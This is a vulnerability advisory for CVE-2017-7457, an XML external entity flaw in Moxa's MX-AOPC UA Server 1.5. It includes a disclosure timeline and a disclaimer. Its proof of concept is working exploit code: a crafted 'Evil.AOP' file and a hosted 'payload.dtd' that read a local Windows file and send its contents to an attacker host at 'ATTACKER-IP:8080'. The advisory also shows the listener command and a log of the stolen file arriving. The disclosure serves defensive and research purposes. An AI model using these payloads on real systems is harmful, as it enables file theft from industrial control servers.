Moxa MX AOPC-Server 1.5 - XML External Entity Injection
2017-04-10 18:05:04[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec
Vendor:
============
www.moxa.com
Product:
=======================
MX-AOPC UA SERVER - 1.5
Moxa's MX-AOPC UA Suite is the first OPC UA server for industrial automation supporting both push and pull communication.
Vulnerability Type:
==============================
XML External Entity Injection
CVE Reference:
==============
CVE-2017-7457
Security Issue:
================
XML External Entity via ".AOP" files used by MX-AOPC Server result in remote file disclosure. If local user opens
a specially crafted malicious MX-AOPC Server file type.
Exploit/POC:
=============
run MX-AOPC UA Server / Runtime / Start Server Runtime Service
a) ATTACKER SERVER LISTENER we will access Windows msfmap.ini as proof of concept
python -m SimpleHTTPServer 8080
"Evil.AOP" file
<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
b) Evil "payload.dtd" file host on ATTACKER SERVER
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
%all;
e.g.
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /payload.dtd HTTP/1.1" 200 -
VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /?;[connect name] will modify the connection if ADC.connect="name";[connect default] will modify the connection if name is not found;[sql name] will modify the Sql if ADC.sql="name(args)";[sql default] will modify the Sql if name is not found;Override strings: Connect, UserId, Password, Sql.;Only the Sql strings support parameters using "?";The override strings must not equal "" or they are ignored;A Sql entry must exist in each sql section or the section is ignored;An Access entry must exist in each connect section or the section is ignored;Access=NoAccess;Access=ReadOnly;Access=ReadWrite;[userlist name] allows specific users to have special access;The Access is computed as follows:; (1) First take the access of the connect section.; (2) If a user entry is found, it will override.[connect default];If we want to disable unknown connect values, we set Access to NoAccessAccess=NoAccess[sql default];If we want to disable unknown sql values, we set Sql to an invalid query.Sql=" "[connect CustomerDatabase]Access=ReadWriteConnect="DSN=AdvWorks"[sql CustomerById]Sql="SELECT * FROM Customers WHERE CustomerID = ?"[connect AuthorDatabase]Access=ReadOnlyConnect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"[userlist AuthorDatabase]Administrator=ReadWrite[sql AuthorById]Sql="SELECT * FROM Authors WHERE au_id = ?" HTTP/1.1" 200 -
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==========================================================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.